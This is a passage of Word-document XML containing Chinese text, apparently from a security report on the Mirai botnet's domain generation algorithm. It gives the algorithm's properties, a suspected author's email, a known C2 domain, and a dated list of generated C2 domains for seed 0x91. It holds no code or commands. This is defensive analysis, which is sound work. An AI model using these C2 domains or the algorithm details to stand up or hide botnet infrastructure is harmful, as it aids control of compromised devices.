          <w:r w:rsidR="00B65ABC" w:rsidRPr="00B65ABC">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:noProof/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t>[6]</w:t>
          </w:r>
          <w:r w:rsidR="003714FD" w:rsidRPr="003714FD">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="003714FD" w:rsidRPr="003714FD">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，其编码属性包括</w:t>
      </w:r>
      <w:r w:rsidR="003714FD">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003714FD" w:rsidRPr="00F63C30" w:rsidRDefault="003714FD" w:rsidP="00F63C30">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F63C30">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>使用3个顶级域名：online/tech/support</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003714FD" w:rsidRPr="00F63C30" w:rsidRDefault="003714FD" w:rsidP="00F63C30">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F63C30">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>L2域名固定长度12字符，每个字符从“a”到“z</w:t>
      </w:r>
      <w:r w:rsidR="00F63C30" w:rsidRPr="00F63C30">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”中随机选择</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003714FD" w:rsidRPr="00F63C30" w:rsidRDefault="00F63C30" w:rsidP="00F63C30">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F63C30">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>域名仅由月、日和硬编码的种子字符串确定</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003714FD" w:rsidRPr="00F63C30" w:rsidRDefault="003714FD" w:rsidP="00F63C30">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F63C30">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>每天只生成一个域名，因此最多存在365个 DGA</w:t>
      </w:r>
      <w:r w:rsidR="00F63C30" w:rsidRPr="00F63C30">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>域名</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003714FD" w:rsidRPr="00F63C30" w:rsidRDefault="003714FD" w:rsidP="00F63C30">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F63C30">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>DGA域名仅在硬编码的C2</w:t>
      </w:r>
      <w:r w:rsidR="00F63C30" w:rsidRPr="00F63C30">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>域名无法解析时使用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B40B90" w:rsidRPr="00B40B90" w:rsidRDefault="00B40B90" w:rsidP="00583BC0"/>
    <w:p w:rsidR="00583BC0" w:rsidRPr="00F63C30" w:rsidRDefault="00F1354A" w:rsidP="00F63C30">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:r w:rsidR="00B71D8D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>对</w:t>
      </w:r>
      <w:r w:rsidR="00EC03BC">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>该样本</w:t>
      </w:r>
      <w:r w:rsidR="00B71D8D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>进行分析，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>他们</w:t>
      </w:r>
      <w:r w:rsidR="00B71D8D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>发现</w:t>
      </w:r>
      <w:r w:rsidR="00EC03BC">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>种子值为0。</w:t>
      </w:r>
      <w:r w:rsidR="005E3C78" w:rsidRPr="00F63C30">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>其中部分域名已经被MIRAI作者注册，列表如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E3C78" w:rsidRDefault="00F63C30" w:rsidP="00583BC0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="1988592"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="2" name="图片 2" descr="http://blog.netlab.360.com/content/images/2016/12/mirai_dga_registered_by_auth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netlab.360.com/content/images/2016/12/mirai_dga_registered_by_author-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988592"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63C30" w:rsidRDefault="00F63C30" w:rsidP="00F63C30">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="420" w:afterAutospacing="0" w:line="473" w:lineRule="atLeast"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其中，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F63C30">
        <w:t>作者 dlinchkravitz@gmail.com在更早时间已经注册了其他mirai C2域名zugzwang.me</w:t>
      </w:r>
      <w:r w:rsidRPr="00F63C30">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F1354A" w:rsidRDefault="00F1354A" w:rsidP="00F63C30">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="420" w:afterAutospacing="0" w:line="473" w:lineRule="atLeast"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2016年12月16日，</w:t>
      </w:r>
      <w:r w:rsidRPr="003714FD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>360网络安全研究院</w:t>
      </w:r>
      <w:r w:rsidR="00466B3F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>借助于其Passive</w:t>
      </w:r>
      <w:r w:rsidR="00466B3F">
        <w:t>DNS系统发现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>了DGA种子值为0x91的Mirai样本，其生成的部分域名及对应日期值如下:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F1354A" w:rsidRPr="00F1354A" w:rsidRDefault="00F1354A" w:rsidP="00F1354A">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F1354A">
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
        <w:t>2016/12/08 pcrpxewicouh.online</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F1354A" w:rsidRPr="00F1354A" w:rsidRDefault="00F1354A" w:rsidP="00F1354A">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F1354A">
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
        <w:t>2016/12/09 rwoywonuobcr.online</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F1354A" w:rsidRPr="00F1354A" w:rsidRDefault="00F1354A" w:rsidP="00F1354A">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F1354A">
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
        <w:t>2016/12/10 liusqxocbedg.online</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F1354A" w:rsidRPr="00F1354A" w:rsidRDefault="00F1354A" w:rsidP="00F1354A">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F1354A">
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
        <w:t>2016/12/11 ndoiabgxgmew.online</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F1354A" w:rsidRPr="00F1354A" w:rsidRDefault="00F1354A" w:rsidP="00F1354A">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F1354A">
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
        <w:t>2016/12/12 hwjqtwkectlo.online</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F1354A" w:rsidRPr="00F1354A" w:rsidRDefault="00F1354A" w:rsidP="00F1354A">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F1354A">
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
        <w:t>2016/12/13 mtoyrjnvlqdx.online</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F1354A" w:rsidRPr="00F1354A" w:rsidRDefault="00F1354A" w:rsidP="00F1354A">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F1354A">
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
        <w:t>2016/12/14 ddfqdttkmoyv.online</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F1354A" w:rsidRPr="00F1354A" w:rsidRDefault="00F1354A" w:rsidP="00F1354A">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F1354A">
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
        <w:t>2016/12/15 iaxjxyqjckqi.online</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F1354A" w:rsidRPr="00F1354A" w:rsidRDefault="00F1354A" w:rsidP="00F1354A">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F1354A">
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
        <w:t>2016/12/16 nuuxndqlhiwb.online</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F1354A" w:rsidRPr="00F1354A" w:rsidRDefault="00F1354A" w:rsidP="00F1354A">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F1354A">
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
        <w:t>2016/12/17 pxvmqwpemiif.online</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F1354A" w:rsidRPr="00F1354A" w:rsidRDefault="00F1354A" w:rsidP="00F1354A">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F1354A">
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
        <w:t>2016/12/18 dfftxpajygxy</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F1354A" w:rsidRPr="00F1354A" w:rsidRDefault="00F1354A" w:rsidP="00F1354A">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F1354A">
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
        <w:t>2016/12/19 fiotbgopgnxv</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F1354A" w:rsidRPr="00F1354A" w:rsidRDefault="00F1354A" w:rsidP="00F1354A">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F1354A">
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
        <w:t>2016/12/20 shjwhbdgjyba.online</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F1354A" w:rsidRPr="00F1354A" w:rsidRDefault="00F1354A" w:rsidP="00F1354A">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F1354A">
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
        <w:t>2016/12/21 xmjvlucdsegk.online</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F1354A" w:rsidRPr="00F1354A" w:rsidRDefault="00F1354A" w:rsidP="00F1354A">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F1354A">
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
        <w:t>2016/12/22 irkbpugkwsir.online</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F1354A" w:rsidRPr="00F1354A" w:rsidRDefault="00F1354A" w:rsidP="00F1354A">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F1354A">
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
        <w:t>2016/12/23 nwnrbhnesmtk.online</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F1354A" w:rsidRPr="00F1354A" w:rsidRDefault="00F1354A" w:rsidP="00F1354A">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F1354A">
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
        <w:t>2016/12/24 wafunxdngsfc.online</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F1354A" w:rsidRPr="00F1354A" w:rsidRDefault="00F1354A" w:rsidP="00F1354A">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F1354A">
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
        <w:t>2016/12/25 ydcvedrxcmym.online</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F1354A" w:rsidRPr="00F1354A" w:rsidRDefault="00F1354A" w:rsidP="00F1354A">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F1354A">
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
        <w:t>2016/12/26 sggiyqadywsv.online</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F1354A" w:rsidRPr="00F1354A" w:rsidRDefault="00F1354A" w:rsidP="00F1354A">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F1354A">
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
        <w:t>2016/12/27 ujmnvkyeltfv</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F1354A" w:rsidRPr="00F1354A" w:rsidRDefault="00F1354A" w:rsidP="00F1354A">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F1354A">
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2016/12/28 cmhewcvopvno.online</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F1354A" w:rsidRPr="00F1354A" w:rsidRDefault="00F1354A" w:rsidP="00F1354A">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F1354A">
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
        <w:t>2016/12/29 hrjlyymassqx</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F1354A" w:rsidRPr="00F1354A" w:rsidRDefault="00F1354A" w:rsidP="00F1354A">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F1354A">
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
        <w:t>2016/12/30 xsvftelyclfh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F1354A" w:rsidRDefault="00F1354A" w:rsidP="00F1354A">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F1354A">
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
        <w:t>2016/12/31 dxukryyyqnhl.online</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F1354A" w:rsidRDefault="00F1354A" w:rsidP="00F1354A">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:ind w:left="840" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F1354A" w:rsidRPr="00F1354A" w:rsidRDefault="00F1354A" w:rsidP="00F1354A">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="240"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F1354A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>其中12月</w:t>
      </w:r>
      <w:r w:rsidRPr="00F1354A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>18/19/27/29/30日只几天未能生成有效的</w:t>
      </w:r>
